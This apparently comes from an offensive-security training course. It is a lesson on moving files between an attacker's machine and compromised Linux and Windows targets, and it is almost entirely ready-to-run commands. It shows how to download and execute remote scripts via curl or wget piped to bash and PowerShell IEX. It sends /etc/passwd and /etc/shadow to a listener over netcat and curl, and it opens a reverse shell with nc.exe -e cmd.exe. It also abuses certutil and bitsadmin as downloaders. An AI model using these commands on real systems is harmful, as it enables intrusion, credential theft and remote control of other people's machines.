Vulnerability Analysis & Exploitation
File Transfer Techniques
4 min read
Moving files between your attack machine and targets is essential. This lesson covers reliable methods for both Linux and Windows targets.
Setting Up File Servers
Python HTTP Server (Most Common)
# Python 3
python3 -m http.server 80
# Python 2
python -m SimpleHTTPServer 80
# Serve specific directory
cd /usr/share/windows-binaries
python3 -m http.server 80
PHP Development Server
php -S 0.0.0.0:80
Apache (Persistent)
# Start Apache
sudo systemctl start apache2
# Copy files to web root
sudo cp file.exe /var/www/html/
Linux File Transfers
wget
# Download file
wget http://10.10.14.5/linpeas.sh
# Save with different name
wget http://10.10.14.5/linpeas.sh -O /tmp/lp.sh
# Execute directly (without saving)
wget -qO- http://10.10.14.5/linpeas.sh | bash
curl
# Download file
curl http://10.10.14.5/linpeas.sh -o linpeas.sh
# Execute directly
curl http://10.10.14.5/linpeas.sh | bash
# Download silently
curl -s http://10.10.14.5/linpeas.sh -o linpeas.sh
Netcat File Transfer
# Receiving end (your machine)
nc -lvnp 4444 > received_file
# Sending end (target)
nc -w 3 10.10.14.5 4444 < /etc/passwd
SCP (If SSH Available)
# Copy to target
scp linpeas.sh user@10.10.10.10:/tmp/
# Copy from target
scp user@10.10.10.10:/etc/passwd ./
Base64 Encoding (No Tools)
# On attacker: encode file
base64 -w 0 shell.elf > shell.b64
cat shell.b64 # Copy output
# On target: decode file
echo "base64_string_here" | base64 -d > shell.elf
chmod +x shell.elf
Windows File Transfers
PowerShell DownloadFile
# Download file
powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.14.5/nc.exe','C:\Users\Public\nc.exe')"
# Shorter version
powershell -c "iwr http://10.10.14.5/nc.exe -OutFile nc.exe"
# Download and execute
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5/script.ps1')"
certutil
# Download file
certutil -urlcache -split -f http://10.10.14.5/nc.exe nc.exe
# Download to specific path
certutil -urlcache -split -f http://10.10.14.5/nc.exe C:\Windows\Temp\nc.exe
Bitsadmin
bitsadmin /transfer job /download /priority high http://10.10.14.5/nc.exe C:\Users\Public\nc.exe
SMB Server (Impacket)
# On attacker: start SMB server
impacket-smbserver share $(pwd) -smb2support
# On target (Windows)
copy \\10.10.14.5\share\nc.exe C:\Users\Public\nc.exe
# Or run directly
\\10.10.14.5\share\nc.exe -e cmd.exe 10.10.14.5 4444
SMB with Authentication
# Start server with auth
impacket-smbserver share $(pwd) -smb2support -user test -password test
# Connect on Windows
net use \\10.10.14.5\share /user:test test
copy \\10.10.14.5\share\file.exe .
Upload Methods
Uploading FROM Target
Linux - Netcat:
# Your machine listens
nc -lvnp 4444 > loot.txt
# Target sends
cat /etc/shadow | nc 10.10.14.5 4444
Linux - curl POST:
# Your machine (start listener)
nc -lvnp 80
# Target sends
curl -X POST -d @/etc/passwd http://10.10.14.5/
Windows - PowerShell:
# Your machine
nc -lvnp 80
# Target sends
powershell -c "$content = Get-Content C:\Users\user\Desktop\file.txt; Invoke-WebRequest -Uri http://10.10.14.5/ -Method POST -Body $content"
File Transfer Cheat Sheet
To Linux Targets
| Method | Command |
|---|---|
| wget | wget http://IP/file |
| curl | curl http://IP/file -o file |
| netcat | nc -lvnp PORT > file |
| scp | scp user@IP:/path/file . |
To Windows Targets
| Method | Command |
|---|---|
| PowerShell | iwr http://IP/file -OutFile file |
| certutil | certutil -urlcache -split -f http://IP/file file |
| SMB | copy \\IP\share\file . |
| bitsadmin | bitsadmin /transfer j /download http://IP/file file |
Quick Reference
# Start HTTP server
python3 -m http.server 80
# Start SMB server
impacket-smbserver share . -smb2support
# Linux download
wget http://10.10.14.5/file
curl http://10.10.14.5/file -o file
# Windows download
certutil -urlcache -split -f http://10.10.14.5/file file
powershell iwr http://10.10.14.5/file -OutFile file
copy \\10.10.14.5\share\file .
Next, we'll cover password attacks and credential harvesting. :::